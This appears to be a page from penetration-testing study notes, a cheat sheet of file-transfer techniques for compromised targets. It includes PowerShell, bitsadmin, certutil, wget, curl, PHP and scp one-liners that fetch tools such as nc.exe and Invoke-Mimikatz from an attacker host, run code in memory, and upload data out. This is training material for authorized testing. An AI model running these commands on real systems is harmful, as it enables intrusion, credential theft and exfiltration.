search

File Transfers

  • In penetration testing, you will usually need to transfer files to and from your targets. For example, you might exploit a target and need to upload a script to check for vulnerabilities in the system.

  • Since there are usually restrictions in place, you need to know different techniques. If one technique doesn’t work, you can try another or even combine or chain different techniques to bypass the controls of the target.

  • There are multiple techniques that work in different situations, some of which utilize Living off the Land binaries. These binaries can be checked here:

    • Windows - https://lolbas-project.github.io/

    • Linux - https://gtfobins.github.io/

  • Below is a cheatsheet with some of the techniques:

Invoke-WebRequest <Target>/<File-to-Download> -OutFile <Output-File-Name> # Download a file using Powershell. Example: Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1

Invoke-WebRequest <File-to-Download> -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "<Output-File>" # Changing the User agent. Example: Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe" # Changing the User agent.

IEX (New-Object Net.WebClient).DownloadString('<Target>/<File-to-Execute>') # Execute a file in memory using powershell. Example: IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke
Mimikatz.ps1')

Invoke-WebRequest -Uri <Target-to-Upload> -Method POST -Body <Data-to-Upload> # Upload a file using Powershell. Example: Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

bitsadmin /transfer n <Source-to-Download-from>/<File-Name> <Output-Path> # Download a file using bitsadmin. Example:  bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

certutil.exe -verifyctl -split -f <Source-to-Download-From>/<File-Name> # Download a file using certutil. Example: certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

wget <Link-to-Download-From> # Downloading a file using wget.

curl -o <Output-File-Name> <URL-to-Download-From> # Download a file using curl.

php -r '$file = file_get_contents("<Source-to-Download-from>"); file_put_contents("<Output-File>",$file);' # Download a file using PHP

scp <Output-File> <Source-to-Download-from> # Download a file using scp. Example: scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip
PreviousVulnerability Scanning (Check)NextUsing the Metasploit Framework

Last updated